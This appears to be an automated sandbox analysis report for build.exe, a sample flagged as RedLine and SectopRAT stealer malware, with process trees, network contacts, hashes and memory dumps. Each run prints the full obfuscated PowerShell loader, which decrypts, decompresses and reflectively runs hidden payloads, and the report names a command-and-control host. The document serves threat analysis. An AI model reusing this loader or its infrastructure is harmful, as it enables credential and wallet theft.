Analysis Overview
SHA256
c34f066c7cb0b738a5c2ffcedcd5ff48b2f8c5247ca38db8739f0c55752318ad
Threat Level: Known bad
The file build.exe was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
RedLine
RedLine payload
SectopRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-10 18:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:43
Platform
win10-20240404-en
Max time kernel
133s
Max time network
144s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2316 wrote to memory of 4104 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2316 wrote to memory of 4104 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1164-5-0x0000000073D3E000-0x0000000073D3F000-memory.dmp
memory/1164-8-0x00000000070C0000-0x00000000070F6000-memory.dmp
memory/1164-9-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-10-0x0000000007730000-0x0000000007D58000-memory.dmp
memory/1164-11-0x00000000076B0000-0x00000000076D2000-memory.dmp
memory/1164-12-0x0000000007DD0000-0x0000000007E36000-memory.dmp
memory/1164-13-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/1164-14-0x0000000008180000-0x00000000084D0000-memory.dmp
memory/1164-17-0x00000000080D0000-0x00000000080EC000-memory.dmp
memory/1164-18-0x00000000085D0000-0x000000000861B000-memory.dmp
memory/1164-19-0x00000000088C0000-0x0000000008936000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5ejdd1o.iaf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1164-30-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-35-0x000000000A060000-0x000000000A6D8000-memory.dmp
memory/1164-36-0x00000000097E0000-0x00000000097FA000-memory.dmp
memory/1164-37-0x0000000009820000-0x0000000009828000-memory.dmp
memory/1164-38-0x0000000009860000-0x0000000009872000-memory.dmp
memory/1164-39-0x0000000009870000-0x000000000988E000-memory.dmp
memory/1164-42-0x000000000A6E0000-0x000000000ACE6000-memory.dmp
memory/1164-43-0x0000000009940000-0x0000000009952000-memory.dmp
memory/1164-44-0x00000000099E0000-0x0000000009A1E000-memory.dmp
memory/1164-45-0x0000000009B30000-0x0000000009C3A000-memory.dmp
memory/1164-52-0x000000000ACF0000-0x000000000AEB2000-memory.dmp
memory/1164-53-0x000000000B3F0000-0x000000000B91C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpA634.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\tmpA649.tmp
| MD5 | cae9079afcb4c379869afa5d34181d8a |
| SHA1 | 188e2435c533dd9633f5fcc09f245ddc1a78db2c |
| SHA256 | 2be0a96da90da69fbc34b8e7747e89ce57dfc4fb58ed6c79e0fc21cb7c6791b7 |
| SHA512 | ff7d863ebd1090219f07eaf2ac493f20b6ed11606e7f2c19536d764e730a8bb426fff26dc3890f0503c12329ea4a6c5d8812a0d1b69c19a29fbb8cb8366bd4fd |
C:\Users\Admin\AppData\Local\Temp\tmpA675.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
memory/1164-360-0x000000000B920000-0x000000000BE1E000-memory.dmp
memory/1164-361-0x000000000AF60000-0x000000000AFF2000-memory.dmp
memory/1164-362-0x000000000AF40000-0x000000000AF5E000-memory.dmp
memory/1164-373-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-374-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-400-0x0000000073D3E000-0x0000000073D3F000-memory.dmp
memory/1164-401-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-402-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-403-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-407-0x0000000073D30000-0x000000007441E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:44
Platform
win10v2004-20240508-en
Max time kernel
91s
Max time network
96s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2816 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2816 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 2.17.196.65:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.196.17.2.in-addr.arpa | udp |
| BE | 2.17.196.65:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1468-3-0x0000000074BCE000-0x0000000074BCF000-memory.dmp
memory/1468-4-0x00000000028A0000-0x00000000028D6000-memory.dmp
memory/1468-5-0x0000000005030000-0x0000000005658000-memory.dmp
memory/1468-6-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-7-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-8-0x0000000005000000-0x0000000005022000-memory.dmp
memory/1468-9-0x0000000005790000-0x00000000057F6000-memory.dmp
memory/1468-10-0x0000000005800000-0x0000000005866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4efd2oib.ope.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1468-20-0x0000000005880000-0x0000000005BD4000-memory.dmp
memory/1468-21-0x0000000005D80000-0x0000000005D9E000-memory.dmp
memory/1468-22-0x0000000005DD0000-0x0000000005E1C000-memory.dmp
memory/1468-23-0x00000000075D0000-0x0000000007C4A000-memory.dmp
memory/1468-24-0x0000000006360000-0x000000000637A000-memory.dmp
memory/1468-25-0x0000000006390000-0x0000000006398000-memory.dmp
memory/1468-26-0x0000000006F50000-0x0000000006F62000-memory.dmp
memory/1468-27-0x0000000006F70000-0x0000000006F8E000-memory.dmp
memory/1468-28-0x0000000007C50000-0x0000000008268000-memory.dmp
memory/1468-29-0x0000000007050000-0x0000000007062000-memory.dmp
memory/1468-30-0x00000000070B0000-0x00000000070EC000-memory.dmp
memory/1468-31-0x0000000007230000-0x000000000733A000-memory.dmp
memory/1468-32-0x0000000008440000-0x0000000008602000-memory.dmp
memory/1468-33-0x0000000008B40000-0x000000000906C000-memory.dmp
memory/1468-34-0x0000000009620000-0x0000000009BC4000-memory.dmp
memory/1468-35-0x0000000008610000-0x00000000086A2000-memory.dmp
memory/1468-36-0x00000000086B0000-0x0000000008726000-memory.dmp
memory/1468-37-0x0000000008790000-0x00000000087AE000-memory.dmp
memory/1468-38-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-39-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-40-0x0000000074BC0000-0x0000000075370000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp7B23.tmp
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\tmp7B49.tmp
| MD5 | 9df444e0de734921d4d96deeeac4b16e |
| SHA1 | 31542622ecf896b93d830e21595091aef8742901 |
| SHA256 | 1d324d34d58165aca7dbf057a7417457776b4e805d60182401a9275fb7920900 |
| SHA512 | 2de6a0ac09b7a1a21cda31e49c072b097ca1959814c535920a099a9df87e993ba2dfd6cebcb8ec2110efca385bb618f771258575a06736afcfd6cd40a8e1a957 |
C:\Users\Admin\AppData\Local\Temp\tmp7B74.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmp7B90.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmp7B7A.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\tmp7BBB.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
memory/1468-217-0x0000000074BCE000-0x0000000074BCF000-memory.dmp
memory/1468-218-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-219-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-222-0x0000000074BC0000-0x0000000075370000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:43
Platform
win11-20240426-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2312 wrote to memory of 1436 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2312 wrote to memory of 1436 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join 